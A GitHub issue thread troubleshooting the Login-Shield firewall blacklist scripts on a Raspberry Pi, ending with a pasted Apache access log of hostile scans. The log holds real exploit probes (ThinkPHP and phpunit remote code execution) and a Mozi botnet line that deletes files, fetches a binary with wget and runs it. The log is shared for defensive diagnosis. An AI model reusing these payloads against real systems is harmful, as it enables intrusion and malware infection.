Comments (54)
DPsystems
commented on August 26, 2024
1
Sorry, I missed this.
The errors you're getting appear to be the result of using the wrong shell. If you're using /bin/sh try /bin/bash or wherever your shell is located.
from login-shield.
aakerbeere
commented on August 26, 2024
1
thx DPsystems and ychaouche
I finally started over by running all the scripts from the INSTALL-Instructions as root, not only sudo.
This seems to have done it:
"
Continue (Y/n)?
Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
"
and as well
"
ipset list | grep -i name
Name: login-shield
"
Happy now. Many thanks.
from login-shield.
DPsystems
commented on August 26, 2024
1
Thanks for helping diagnose this!
Yes, basically login-shield is manually enabled by default. I don't have it set up to automatically run when the server reboots. Since this is a system that has the potential to lock you out of remote server access, I feel by default I shouldn't hook it into startup, but once you test the system and make sure the blacklists you use are acceptable, then you can automate the process. I tend to manually reboot my servers, so I manually re-run the commands. I still consider the system in beta right now so it needs a bit more polish but really appreciate everybody helping!
from login-shield.
aakerbeere
commented on August 26, 2024
1
thx
Nothing yet. I will report.
from login-shield.
aakerbeere
commented on August 26, 2024
1
The line is actually uncommented on the devices local instance of ".../set-iptables.sh" but not on ".../set-iptables.sh-config"
from login-shield.
ychaouche
commented on August 26, 2024
24 days; no reply ?
from login-shield.
aakerbeere
commented on August 26, 2024
Yes, sadly no reply yet :-(
Am 26. Apr. 2021, 11:59, um 11:59, Yassine Chaouche ***@***.***> schrieb:
…24 days; no reply ?
--
You are receiving this because you authored the thread.
Reply to this email directly or view it on GitHub:
#4 (comment)
from login-shield.
DPsystems
commented on August 26, 2024
I believe the shell script I am using is bash. run "whereis bash" and then execute that command before running the script like /usr/bin/bash
from login-shield.
aakerbeere
commented on August 26, 2024
got it thx
When adding blacklists i get for ex.
"
Blacklisting 96.127.128.0/18
ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
The set with the given name does not exist
"
don't know if this is expected.
and when enabling i get
"
Running: set-iptables.sh
....
Continue (Y/n)?
Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.
Try `iptables -h' or 'iptables --help' for more information.
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.
Try `iptables -h' or 'iptables --help' for more information.
Done.
"
Correct?
thx for helping
from login-shield.
DPsystems
commented on August 26, 2024
Before setting up iptables, you have to define the ipset lists. there must have been an error initially creating the ipset list? There's a specific order you need to run the commands in.
step 1: create the ipset list
step 2: run the blacklist* scripts to add IP to the blacklists
step 3: set iptables to use the ipset lists
maybe step 1 wasn't done?
from login-shield.
aakerbeere
commented on August 26, 2024
I strictly followed the INSTALL-Instructions.
Should i start over?
from login-shield.
DPsystems
commented on August 26, 2024
Did you get an error message when running ./create-blacklist.sh?
Do you have ipset installed?
What do you get when you run the command: ipset list | grep -i name ?
There should be a set called "login-shield".
If there isn't something is going wrong creating the ipset list.
from login-shield.
aakerbeere
commented on August 26, 2024
Did you get an error message when running ./create-blacklist.sh?
I don't remember. I would say no. Otherwise i would have been looking for it. Can i run the script again?
ipset/stable,now 6.38-1.2 arm64 [installed]
ipset list | grep -i name
ipset v6.38: Kernel error received: Operation not permitted
***@:~ $ sudo ipset list | grep -i name
->empty output
many tanks for helping. I appreciate.
from login-shield.
aakerbeere
commented on August 26, 2024
Should i try to run all this being root, not only sudo?
from login-shield.
DPsystems
commented on August 26, 2024
yes, all this stuff needs to be run as root
from login-shield.
DPsystems
commented on August 26, 2024
By the way, when you run into stuff like this, be sure to identify what OS/version you're running.
from login-shield.
DPsystems
commented on August 26, 2024
The command (as root) you want to execute is:
ipset -exist create login-shield hash:net
It looks like the ipset list isn't being created for some reason.
from login-shield.
ychaouche
commented on August 26, 2024
@DPsystems did you pay attention to this error message ?
ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
reference : #4 (comment)
from login-shield.
aakerbeere
commented on August 26, 2024
Yes i did. Couldn't find helpful information about this yet. I actually don't know how to proceed.
thx
from login-shield.
ychaouche
commented on August 26, 2024
@aakerbeere it seems you have a version mismatch between what is supported in your kernel and what is used in the tools (ipset and/or iptables). Either a kernel upgrade or an application downgrade would be a possible solution.
from login-shield.
ychaouche
commented on August 26, 2024
There could have been a system update in the meantime that resolved the problem. Anyway, happy to hear it's working for you :)
from login-shield.
aakerbeere
commented on August 26, 2024
One question remaining from INSTALL-Instructions:
"NOTE: This is not persistent unless you make it persistent."
and
"If you want to set up login-shield to run automatically at boot time, that's beyond the scope of this guide. But it's obviously not terribly difficult to do."
Does this mean "set-iptables.sh" has to be run at boot. If i'm right i will set up a crontab entry.
thx
from login-shield.
ychaouche
commented on August 26, 2024
You should run create-blacklist.sh, any number of blacklist-* scripts of your choice, and set-iptables.sh, in that order. You can put those in a single script and run that instead.
$ cat loginshield.sh
sudo ./create-blacklist.sh
# any number of these below
# sudo ./blacklist-main-nonUS.sh
# sudo ./blacklist-others.sh
# sudo./blacklist-proxies.sh
# sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh
$
You can either create a crontab entry for you script with the special @reboot time specification (not supported by all crontab versions), or simply call your script from /etc/rc.local which is executed after booting.
from login-shield.
RobbieTheK
commented on August 26, 2024
sudo ./create-blacklist.sh
any number of these below
sudo ./blacklist-main-nonUS.sh
sudo ./blacklist-others.sh
sudo./blacklist-proxies.sh
sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh
Well you need to reference the full path to these files and then you have to create a way to automatically respond with "yes".
from login-shield.
ychaouche
commented on August 26, 2024
Maybe
sudo echo yes | /path/to/create-blacklist.sh
sudo echo yes | /path/to/blacklist-main-nonUS.sh
sudo echo yes | /path/to/blacklist-others.sh
sudo echo yes | /path/to/blacklist-proxies.sh
sudo echo yes | /path/to/blacklist-US-hosting.sh
sudo echo yes | /path/to/set-iptables.sh
(not tested)
from login-shield.
aakerbeere
commented on August 26, 2024
sry RobbieTheK
I accidentally submitted the comment.
thx ychaouche
I attempted to set it up using crontab. It didnt work. Probably raspberrys crontab does not support @reboot. So i set up "rc.local".
Actually the script looks like this:
#!/bin/sh -e
cd /usr/local/bin/Login-Shield-master
echo | ./create-blacklist.sh
echo | ./blacklist-main-nonUS.sh
echo | ./blacklist-others.sh
echo | ./blacklist-proxies.sh
echo | ./blacklist-US-hosting.sh
echo | ./set-iptables.sh
exit 0Because the scripts affected need confirmation to continue, i needed each appropriate call to be preceded by "echo | ".
After reboot:
ipset list | grep -i name
Name: login-shieldSo successfully set up "Login-Shield" or allways missing something?
Thx to all spending time to help me.
from login-shield.
ychaouche
commented on August 26, 2024
You should be good I guess. I don't know If this is also another good way to check :
iptables -L --match-set login-shield
Where login-shield rules should be listed.
from login-shield.
aakerbeere
commented on August 26, 2024
Raspberry must be using a different package.
I get
iptables v1.8.2 (nf_tables): unknown option "--match-set"from login-shield.
RobbieTheK
commented on August 26, 2024
sudo echo yes | /path/to/create-blacklist.sh
sudo echo yes | /path/to/blacklist-main-nonUS.sh
sudo echo yes | /path/to/blacklist-others.sh
sudo echo yes | /path/to/blacklist-proxies.sh
sudo echo yes | /path/to/blacklist-US-hosting.sh
sudo echo yes | /path/to/set-iptables.sh
Well you have to then edit each blacklist* script with the correct/full path to the respective ipset* script otherwise you get:
#######
#
Adding ./ipset-main-nonUS.lst to the login-shield blacklist, which contains cat: ./ipset-main-nonUS.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-main-nonUS.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-main-nonUS.sh: line 56: ./ipset-main-nonUS.lst: No such file or directory
## end.
#######
#
Adding ./ipset-others.lst to the login-shield blacklist, which contains cat: ./ipset-others.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-others.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-others.sh: line 54: ./ipset-others.lst: No such file or directory
from login-shield.
aakerbeere
commented on August 26, 2024
Having some doubt i did some further investigation and found
systemctl status rc-local.service
● rc-local.service - /etc/rc.local Compatibility
Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
Drop-In: /lib/systemd/system/rc-local.service.d
└─debian.conf
/etc/systemd/system/rc-local.service.d
└─ttyoutput.conf
Active: failed (Result: exit-code) since Wed 2021-04-28 21:04:36 CEST; 30s ago
Process: 3556 ExecStart=/etc/rc.local start (code=exited, status=2)
Apr 28 21:04:36 rpi4nc systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" une
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 rpi4nc systemd[1]: Failed to start /etc/rc.local Compatibility.and in "syslog"
Apr 28 21:04:36 localhost systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 localhost systemd[1]: Failed to start /etc/rc.local Compatibility.So this does not seem to run as expected.
from login-shield.
RobbieTheK
commented on August 26, 2024
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")
Put the full path to the file, e.g., echo yes | /root/Login-Shieild/blacklist-main-nonUS.sh
from login-shield.
DPsystems
commented on August 26, 2024
Looks like a shell/reference issue. I believe the scripts were written using bash.
from login-shield.
aakerbeere
commented on August 26, 2024
I did some changes to "/etc/rc.local":
#!/bin/bash
cd /usr/local/bin/Login-Shield-master
/usr/local/bin/Login-Shield-master/create-blacklist.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-main-nonUS.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-others.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-proxies.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-US-hosting.sh
echo | /usr/local/bin/Login-Shield-master/set-iptables.sh
exit 0then i get
# systemctl status rc-local.service
Warning: The unit file, source configuration file or drop-ins of rc-local.service changed on disk. Run 'systemctl daemon-reload' to reload units.
● rc-local.service - /etc/rc.local Compatibility
Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
Drop-In: /lib/systemd/system/rc-local.service.d
└─debian.conf
/etc/systemd/system/rc-local.service.d
└─ttyoutput.conf
Active: active (exited) since Wed 2021-04-28 22:04:39 CEST; 37s ago
Process: 667 ExecStart=/etc/rc.local start (code=exited, status=0/SUCCESS)
Apr 28 22:04:37 ****** systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 22:04:38 ****** rc.local[667]: ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added
Apr 28 22:04:39 ****** systemd[1]: Started /etc/rc.local Compatibility.When doing systemctl daemon-reload the warning disapears but does not survive reboot. And again there is a strange Kernel support protocol versions confusion.
from login-shield.
aakerbeere
commented on August 26, 2024
So i configured this as a service. After reboot i get
# systemctl status loginshield.service
● loginshield.service - Login-Shield service
Loaded: loaded (/etc/systemd/system/loginshield.service; enabled; vendor preset: enabled)
Active: inactive (dead) since Wed 2021-04-28 23:37:56 CEST; 49s ago
Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
Main PID: 655 (code=exited, status=0/SUCCESS)
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: # This script will enable the LOGIN-SHIELD IP blacklist via IPTABLES
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: # WARNING: This can cause you to lose connectivity to your server if not properly configured!
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Yes
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: ## Done.
Apr 28 23:37:56 rpi4nc systemd[1]: loginshield.service: Succeeded.I guess the inactive (dead) output is expected because the script comes to a successfull end and then terminates and nothing more to do.
Maybe successful this time?
from login-shield.
DPsystems
commented on August 26, 2024
I don't know. I've never configured it as a service before. sounds interesting.. let us know how it works!
from login-shield.
ychaouche
commented on August 26, 2024
Status=0/SUCCESS
Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
Main PID: 655 (code=exited, status=0/SUCCESS)
Also pay attention to this line :
Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added
This probably means you have run the script once and it succeeded adding the ruleset, then you ran it again ? I don't know if @DPsystems has code to detect that, on the other hand maybe the consequences aren't so important and can be safely ignored. But it's always better to have a clean, deterministic and consistent way to run the script, i.e we should be covering as much cases and outcomes as possible.
from login-shield.
aakerbeere
commented on August 26, 2024
@ychaouche: Because i was looking for a way to have this done automatically at boot time, the scripts have been run mutiple times. So, this was expected.
@DPsystems: Raspberry Pi Documentation indicates some possible drawbacks that i was probably suffering from when trying "rc.local"-method. As well there i found the hint for the "systemd"-method. With this i don't have any of the issues i got before with "rc.local".
But even if this is running without errors, i don't know if iptables does some blocking. Can i verify somehow, f. ex. logfiles?
thx for spending time. I appreciate.
from login-shield.
ychaouche
commented on August 26, 2024
The set-iptables.sh script has already the necessary LOG instructions
[...]
LOG_PREFIX="ShD-Lgn"
[...]
echo "iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX"
# optional command to LOG dropped connections via the kern.warning syslog service. Comment out the iptables to disable
iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX
You should look for syslog lines prefixed with ShD-Lgn
$ grep ShD-Lgn /var/log/syslog
from login-shield.
ychaouche
commented on August 26, 2024
Is this device running any popular web-facing services ? (ssh, ftp, imap, pop3, smtp, http, https)
from login-shield.
aakerbeere
commented on August 26, 2024
Yes, private Cloud.
ssh, https
from login-shield.
DPsystems
commented on August 26, 2024
By default, the system logs all blocks. There are two shell scripts that will report on the status of things if properly configured to look in the appropriate logs (see attack_stats.sh and count_logins.sh)
from login-shield.
aakerbeere
commented on August 26, 2024
thx
$ sudo /usr/local/bin/Login-Shield-master/attack_stats.sh ... ======= Attack Statistics based on current log files ======= Using: /var/log/messages Key: ShD- From: Apr 25 00:00:06 To : Apr 30 19:10:45 -- Number of blocked attacks in log files : 0 -- Number of unique IP addresses attacking : 0 Average # of attacks per IP : -2147483647 Percentage of attacks from top 50 IPs : nan% Percentage of attacks from top 10 IPs : nan% Percentage of attacks from top 5 IPs : nan% Top 20: Attacks: IP Address: --------------------- $ sudo /usr/local/bin/Login-Shield-master/count_logins.sh ... ============= Login-Shield Statistics based on current log files =========== Using: /var/log/messages and /var/log/secure -- Number of login failures in log files: 0 Start: End : ===================================== -- Number of filtered connections: 0 Start: Apr 25 00:00:06 localhost rsyslogd: [origin software="rsyslogd" swVersion="8.1901.0" x-pid="442" x-info="https://www.rsyslog.com"] rsyslogd was HUPed End : Apr 30 19:14:55 localhost kernel: [25003.117303] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2 ============================================================================ Total system attacks: 0 Blocked attempts : 0 Attacks got through : 0 --------------------------------- % Of Attacks Blocked: 100% ============================================================================from login-shield.
DPsystems
commented on August 26, 2024
Hmmm, make sure there are log entries in the file it's looking for (and that the prefix "ShD" is prepended to those entries according to the iptables command - I've only tested this under CentOS 7 so the logging may be slightly different for other OSes.
I guess it's also possible that different systems will also log failed logins differently than what I might have in the script.
from login-shield.
aakerbeere
commented on August 26, 2024
Thank you DPsystems
"/var/log/messages" was already present but no entries with 'ShD'-prefix, "/var/log/secure" was not. I created it (actually empty).
Login attempts are recorded in '/var/log/auth.log'
from login-shield.
aakerbeere
commented on August 26, 2024
I realized creating "/var/log/secure" was useless.
from login-shield.
aakerbeere
commented on August 26, 2024
I actually discovered plenty of connections in "/var/log/apache2/other_vhosts_access.log"
<sld>.<tld>:80 3.14.72.59 - - [01/May/2021:00:22:42 +0200] "GET / HTTP/1.1" 400 0 "-" "-"
<sld>.<tld>:80 89.163.146.178 - - [01/May/2021:00:37:36 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
<sld>.<tld>:80 193.46.255.97 - - [01/May/2021:01:10:42 +0200] "HEAD /robots.txt HTTP/1.0" 301 351 "-" "-"
<sld>.<tld>:80 89.238.223.30 - - [01/May/2021:01:22:43 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
<sld>.<tld>:80 167.99.186.47 - - [01/May/2021:01:27:11 +0200] "GET /.env HTTP/1.1" 301 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
<sld>.<tld>:80 138.197.122.201 - - [01/May/2021:01:30:17 +0200] "GET / HTTP/1.1" 301 657 "-" "curl/7.58.0"
<sld>.<tld>:80 178.72.68.214 - - [01/May/2021:02:01:36 +0200] "POST /HNAP1/ HTTP/1.0" 301 688 "-" "-"
<sld>.<tld>:80 89.248.165.182 - - [01/May/2021:02:03:55 +0200] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 301 726 "-" "libwww-perl/6.46"
<sld>.<tld>:80 128.14.133.58 - - [01/May/2021:02:07:27 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /api/jsonws/invoke HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 912 "-" "Mozilla/5.0 (Windows NT 10.0; Wi$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 766 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 734 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.39$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.390$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /console/ HTTP/1.1" 301 692 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:18 +0200] "GET /_ignition/execute-solution HTTP/1.1" 301 728 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 209.141.51.242 - - [01/May/2021:02:43:12 +0200] "GET /config/getuser?index=0 HTTP/1.1" 301 720 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:03 +0200] "GET / HTTP/1.1" 301 676 "-" "-"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:13 +0200] "GET / HTTP/1.0" 301 676 "-" "-"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:25 +0200] "POST /_ignition/execute-solution HTTP/1.1" 301 709 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:26 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 757 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:28 +0200] "GET /login HTTP/1.1" 301 667 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:29 +0200] "GET /jenkins/login HTTP/1.1" 301 683 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:30 +0200] "GET /manager/html HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:31 +0200] "GET /wp-login.php HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:33 +0200] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 301 875 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X $
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:39 +0200] "GET / HTTP/1.1" 301 713 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:56 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:12:17 +0200] "GET /favicon.ico HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 202.150.149.82 - - [01/May/2021:05:22:59 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 84.232.147.190 - - [01/May/2021:06:03:48 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 128.14.134.170 - - [01/May/2021:06:42:01 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:07:38:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 192.227.137.68 - - [01/May/2021:07:53:36 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
<sld>.<tld>:80 61.3.149.229 - - [01/May/2021:09:14:50 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://61.3.149.229:40707/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 901 "-" "Hello, world"
<sld>.<tld>:80 51.254.59.113 - - [01/May/2021:10:10:01 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
<sld>.<tld>:80 180.149.125.175 - - [01/May/2021:11:23:31 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
<sld>.<tld>:80 192.241.219.233 - - [01/May/2021:11:53:44 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 zgrab/0.x"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:01:59 +0200] "GET /robots.txt HTTP/1.1" 301 674 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:02:19 +0200] "GET /robots.txt HTTP/1.1" 301 682 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:12:27:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:37 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:53 +0200] "\x16\x03\x01" 400 0 "-" "-"
